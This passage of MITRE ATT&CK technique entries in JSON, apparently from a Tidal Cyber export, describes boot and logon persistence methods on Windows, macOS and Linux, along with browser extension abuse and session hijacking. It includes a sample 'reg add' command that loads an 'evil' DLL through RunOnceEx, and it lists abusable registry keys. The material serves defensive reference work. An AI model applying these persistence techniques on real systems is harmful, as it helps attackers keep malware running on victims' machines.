"description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.<sup>[[Microsoft Run Key](https://app.tidalcyber.com/references/0d633a50-4afd-4479-898e-1a785f5637da)]</sup> These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n\nRun keys may exist under multiple hives.<sup>[[Microsoft Wow6432Node 2018](https://app.tidalcyber.com/references/cbc14af8-f0d9-46c9-ae2c-d93d706ac84e)]</sup><sup>[[Malwarebytes Wow6432Node 2016](https://app.tidalcyber.com/references/d4eba34c-d76b-45b4-bcaf-0f13459daaad)]</sup> The <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.<sup>[[Microsoft Run Key](https://app.tidalcyber.com/references/0d633a50-4afd-4479-898e-1a785f5637da)]</sup> For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: <code>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\"</code> <sup>[[Oddvar Moe RunOnceEx Mar 2018](https://app.tidalcyber.com/references/36d52213-8d9f-4642-892b-40460d5631d7)]</sup>\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup</code>. The startup folder path for all users is <code>C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp</code>.\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n\nPrograms listed in the load value of the registry key <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> run automatically for the currently logged-on user.\n\nBy default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to make the Registry entries look as if they are associated with legitimate programs.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1547.001"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "0ca28cc0-89d0-4680-baef-94d7202c6a9b",
"value": "Registry Run Keys / Startup Folder"
},
{
"description": "Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to \"Reopen windows when logging back in\".<sup>[[Re-Open windows on Mac](https://app.tidalcyber.com/references/ed907f1e-71d6-45db-8ef3-75bec59c238b)]</sup> When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.<sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup><sup>[[Wardle Persistence Chapter](https://app.tidalcyber.com/references/6272b9a2-d704-43f3-9e25-6c434bb5d1ef)]</sup> Applications listed in this file are automatically reopened upon the users next logon.\n\nAdversaries can establish [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1547.007"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "9459a27a-b892-4864-9916-814130bea485",
"value": "Re-opened Applications"
},
{
"description": "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.\n\nThe SSP configuration is stored in two Registry keys: <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages</code> and <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.<sup>[[Graeber 2014](https://app.tidalcyber.com/references/f2f9a6bf-b4d9-461e-b961-0610ea72faf0)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1547.005"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "8a6ec54e-c7cd-4e3c-b848-21f8be2f864a",
"value": "Security Support Provider"
},
{
"description": "Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.\n\nAdversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.<sup>[[Shortcut for Persistence ](https://app.tidalcyber.com/references/4a12e927-0511-40b1-85f3-869ffc452c2e)]</sup> Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.\n\nShortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://app.tidalcyber.com/technique/040804f6-6a87-4011-8716-66682bc16ed4)) to persistently launch malware.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1547.009"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "bfde0a09-8109-41e4-b8c9-68fe20e8131b",
"value": "Shortcut Modification"
},
{
"description": "Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.<sup>[[Microsoft W32Time Feb 2018](https://app.tidalcyber.com/references/991f7a9f-4317-42fa-bc9b-f533fe36b517)]</sup> W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.<sup>[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]</sup>\n\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\</code>.<sup>[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]</sup> The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.<sup>[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]</sup>\n\nAdversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.<sup>[[Github W32Time Oct 2017](https://app.tidalcyber.com/references/a248fd87-c3c1-4de7-a9af-0436a10f71aa)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1547.003"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "2e8cd9a0-846f-416b-80ba-21a15019ce73",
"value": "Time Providers"
},
{
"description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\</code> and <code>HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\</code> are used to manage additional helper programs and functionalities that support Winlogon.<sup>[[Cylance Reg Persistence Sept 2013](https://app.tidalcyber.com/references/9e9c745f-19fd-4218-b8dc-85df804ecb70)]</sup> \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: <sup>[[Cylance Reg Persistence Sept 2013](https://app.tidalcyber.com/references/9e9c745f-19fd-4218-b8dc-85df804ecb70)]</sup>\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1547.004"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "6f42559d-fb54-4c82-9ea7-eb9c709dac07",
"value": "Winlogon Helper DLL"
},
{
"description": "Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a users desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the users desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.<sup>[[Free Desktop Application Autostart Feb 2006](https://app.tidalcyber.com/references/0885434e-3908-4425-9597-ce6abe531ca5)]</sup><sup>[[Free Desktop Entry Keys](https://app.tidalcyber.com/references/4ffb9866-1cf4-46d1-b7e5-d75bd98de018)]</sup>\n\nAdversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the `Exec` directive in the `.desktop` configuration file. When the users desktop environment is loaded at user login, the `.desktop` files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the `/etc/xdg/autostart` directory while the user entries are located in the `~/.config/autostart` directory.\n\nAdversaries may combine this technique with [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to blend malicious Autostart entries with legitimate programs.<sup>[[Red Canary Netwire Linux 2022](https://app.tidalcyber.com/references/6d4c6c52-38ae-52f5-b438-edeceed446a5)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1547.013"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "45f107b6-ae8e-49d7-a3fc-ea6437fbac76",
"value": "XDG Autostart Entries"
},
{
"description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.<sup>[[Microsoft Run Key](https://app.tidalcyber.com/references/0d633a50-4afd-4479-898e-1a785f5637da)]</sup><sup>[[MSDN Authentication Packages](https://app.tidalcyber.com/references/e9bb8434-9b6d-4301-bfe2-5c83ceabb020)]</sup><sup>[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]</sup><sup>[[Cylance Reg Persistence Sept 2013](https://app.tidalcyber.com/references/9e9c745f-19fd-4218-b8dc-85df804ecb70)]</sup><sup>[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)]</sup> These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8bd564d2-a3f1-4367-8631-a2d2cb3a1f46",
"type": "similar"
},
{
"dest-uuid": "7ede5868-1109-4f22-abc7-9495658f7866",
"type": "similar"
},
{
"dest-uuid": "74e2b24b-3bf7-4361-bc07-983bffe674f7",
"type": "similar"
},
{
"dest-uuid": "6556e1cb-87d0-4e67-9d5c-343d1eddf430",
"type": "similar"
},
{
"dest-uuid": "bce86020-2851-4b01-97a9-e51a6b23ea68",
"type": "similar"
},
{
"dest-uuid": "ffd9430b-c727-47f4-a1f0-b1d4f8c29740",
"type": "similar"
},
{
"dest-uuid": "f7544b99-d596-43dd-ab12-3844756f3ad7",
"type": "similar"
},
{
"dest-uuid": "0ca28cc0-89d0-4680-baef-94d7202c6a9b",
"type": "similar"
},
{
"dest-uuid": "9459a27a-b892-4864-9916-814130bea485",
"type": "similar"
},
{
"dest-uuid": "8a6ec54e-c7cd-4e3c-b848-21f8be2f864a",
"type": "similar"
},
{
"dest-uuid": "bfde0a09-8109-41e4-b8c9-68fe20e8131b",
"type": "similar"
},
{
"dest-uuid": "2e8cd9a0-846f-416b-80ba-21a15019ce73",
"type": "similar"
},
{
"dest-uuid": "6f42559d-fb54-4c82-9ea7-eb9c709dac07",
"type": "similar"
},
{
"dest-uuid": "45f107b6-ae8e-49d7-a3fc-ea6437fbac76",
"type": "similar"
}
],
"uuid": "17b97c19-b986-4653-850a-44aee9aaaba1",
"value": "Boot or Logon Autostart Execution"
},
{
"description": "Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.<sup>[[Login Scripts Apple Dev](https://app.tidalcyber.com/references/9c0094b6-a8e3-4f4d-8d2e-33b408d44a06)]</sup><sup>[[LoginWindowScripts Apple Dev](https://app.tidalcyber.com/references/340eb8df-cc22-4b59-8dca-32ec52fd6818)]</sup> \n\nAdversaries can add or insert a path to a malicious script in the <code>com.apple.loginwindow.plist</code> file, using the <code>LoginHook</code> or <code>LogoutHook</code> key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.<sup>[[S1 macOs Persistence](https://app.tidalcyber.com/references/ce952a0d-9c0d-4a51-9564-7cc5d9e43e2c)]</sup><sup>[[Wardle Persistence Chapter](https://app.tidalcyber.com/references/6272b9a2-d704-43f3-9e25-6c434bb5d1ef)]</sup>\n\n**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) and [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00) ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1037.002"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "fdf95fac-f7f2-4901-b5fe-b2bafa443939",
"value": "Login Hook"
},
{
"description": "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.<sup>[[TechNet Logon Scripts](https://app.tidalcyber.com/references/896cf5dd-3fe7-44ab-bbaf-d8b2b9980dca)]</sup> This is done via adding a path to a script to the <code>HKCU\\Environment\\UserInitMprLogonScript</code> Registry key.<sup>[[Hexacorn Logon Scripts](https://app.tidalcyber.com/references/bdcdfe9e-1f22-4472-9a86-faefcb5c5618)]</sup>\n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1037.001"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "b34ba0fd-493c-4e68-91c4-918f495ad07c",
"value": "Logon Script (Windows)"
},
{
"description": "Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.<sup>[[Petri Logon Script AD](https://app.tidalcyber.com/references/1de42b0a-3dd6-4f75-bcf3-a2373e349a39)]</sup> These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems. \n \nAdversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1037.003"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "3701f955-596b-422e-9fce-09c4f49cf080",
"value": "Network Logon Script"
},
{
"description": "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like systems startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.\n\nAdversaries can establish persistence by adding a malicious binary path or shell commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts specific to the Unix-like distribution.<sup>[[IranThreats Kittens Dec 2017](https://app.tidalcyber.com/references/8338ad75-89f2-47d8-b85b-7cbf331bd7cd)]</sup><sup>[[Intezer HiddenWasp Map 2019](https://app.tidalcyber.com/references/dfef8451-031b-42a6-8b78-d25950cc9d23)]</sup> Upon reboot, the system executes the script's contents as root, resulting in persistence.\n\nAdversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.<sup>[[intezer-kaiji-malware](https://app.tidalcyber.com/references/ef1fbb40-da6f-41d0-a44a-9ff444e2ad89)]</sup>\n\nSeveral Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://app.tidalcyber.com/technique/). <sup>[[Apple Developer Doco Archive Launchd](https://app.tidalcyber.com/references/41311827-3d81-422a-9b07-ee8ddc2fc7f1)]</sup><sup>[[Startup Items](https://app.tidalcyber.com/references/e36dd211-22e4-4b23-befb-fbfe1a84b866)]</sup> This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.<sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup> To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.<sup>[[Ubuntu Manpage systemd rc](https://app.tidalcyber.com/references/6be16aba-a37f-49c4-9a36-51d2676f64e6)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1037.004"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "46ef0f74-b028-4b35-8980-bed066feb60c",
"value": "RC Scripts"
},
{
"description": "Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.<sup>[[Startup Items](https://app.tidalcyber.com/references/e36dd211-22e4-4b23-befb-fbfe1a84b866)]</sup>\n\nThis is technically a deprecated technology (superseded by [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)), and thus the appropriate folder, <code>/Library/StartupItems</code> isnt guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory. \n\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.<sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup> Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1037.005"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "3d52cd7c-d81b-4762-9749-612bbbccb415",
"value": "Startup Items"
},
{
"description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. \n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \n\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "fdf95fac-f7f2-4901-b5fe-b2bafa443939",
"type": "similar"
},
{
"dest-uuid": "b34ba0fd-493c-4e68-91c4-918f495ad07c",
"type": "similar"
},
{
"dest-uuid": "3701f955-596b-422e-9fce-09c4f49cf080",
"type": "similar"
},
{
"dest-uuid": "46ef0f74-b028-4b35-8980-bed066feb60c",
"type": "similar"
},
{
"dest-uuid": "3d52cd7c-d81b-4762-9749-612bbbccb415",
"type": "similar"
}
],
"uuid": "c51f799b-7305-43db-8d3b-657965cad68a",
"value": "Boot or Logon Initialization Scripts"
},
{
"description": "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.<sup>[[Wikipedia Browser Extension](https://app.tidalcyber.com/references/52aef082-3f8e-41b4-af95-6631ce4c9e91)]</sup><sup>[[Chrome Extensions Definition](https://app.tidalcyber.com/references/fe00cee9-54d9-4775-86da-b7db73295bf7)]</sup>\n\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.<sup>[[Malicious Chrome Extension Numbers](https://app.tidalcyber.com/references/f34fcf1f-370e-4b6e-9cc4-7ee4075faf6e)]</sup> Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.\n\nPrevious to macOS 11, adversaries could silently install browser extensions via the command line using the <code>profiles</code> tool to install malicious <code>.mobileconfig</code> files. In macOS 11+, the use of the <code>profiles</code> tool can no longer install configuration profiles, however <code>.mobileconfig</code> files can be planted and installed with user interaction.<sup>[[xorrior chrome extensions macOS](https://app.tidalcyber.com/references/84bfd3a1-bda2-4821-ac52-6af8515e5879)]</sup>\n\nOnce the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.<sup>[[Chrome Extension Crypto Miner](https://app.tidalcyber.com/references/ae28f530-40da-451e-89b8-b472340c3e0a)]</sup><sup>[[ICEBRG Chrome Extensions](https://app.tidalcyber.com/references/459bfd4a-7a9b-4d65-b574-acb221428dad)]</sup><sup>[[Banker Google Chrome Extension Steals Creds](https://app.tidalcyber.com/references/93f37adc-d060-4b35-9a4d-62d2ad61cdf3)]</sup><sup>[[Catch All Chrome Extension](https://app.tidalcyber.com/references/eddd2ea8-89c1-40f9-b6e3-37cbdebd210e)]</sup>\n\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.<sup>[[Stantinko Botnet](https://app.tidalcyber.com/references/d81e0274-76f4-43ce-b829-69f761e280dc)]</sup> There have also been similar examples of extensions being used for command & control.<sup>[[Chrome Extension C2 Malware](https://app.tidalcyber.com/references/b0fdf9c7-614b-4269-ba3e-7d8b02aa8502)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "040804f6-6a87-4011-8716-66682bc16ed4",
"value": "Browser Extensions"
},
{
"description": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.<sup>[[Kaspersky Autofill](https://app.tidalcyber.com/references/561ff84d-17ce-511c-af0c-059310f3c129)]</sup>\n\nBrowser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://app.tidalcyber.com/technique/838c5038-91e7-4648-925e-a142c8c10853) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).<sup>[[Chrome Roaming Profiles](https://app.tidalcyber.com/references/cf0bb77d-c7f7-515b-9217-ba9120cdddec)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "f1af5c8b-3210-4788-a873-97b1518bb43a",
"value": "Browser Information Discovery"
},
{
"description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.<sup>[[Wikipedia Man in the Browser](https://app.tidalcyber.com/references/f8975da7-4c50-4b3b-8ecb-c99c9b3bc20c)]</sup>\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.<sup>[[Cobalt Strike Browser Pivot](https://app.tidalcyber.com/references/0c1dd453-7281-4ee4-9c8f-bdc401cf48d7)]</sup><sup>[[ICEBRG Chrome Extensions](https://app.tidalcyber.com/references/459bfd4a-7a9b-4d65-b574-acb221428dad)]</sup> Executing browser-based behaviors such as pivoting may require specific process permissions, such as <code>SeDebugPrivilege</code> and/or high-integrity/administrator rights.\n\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as 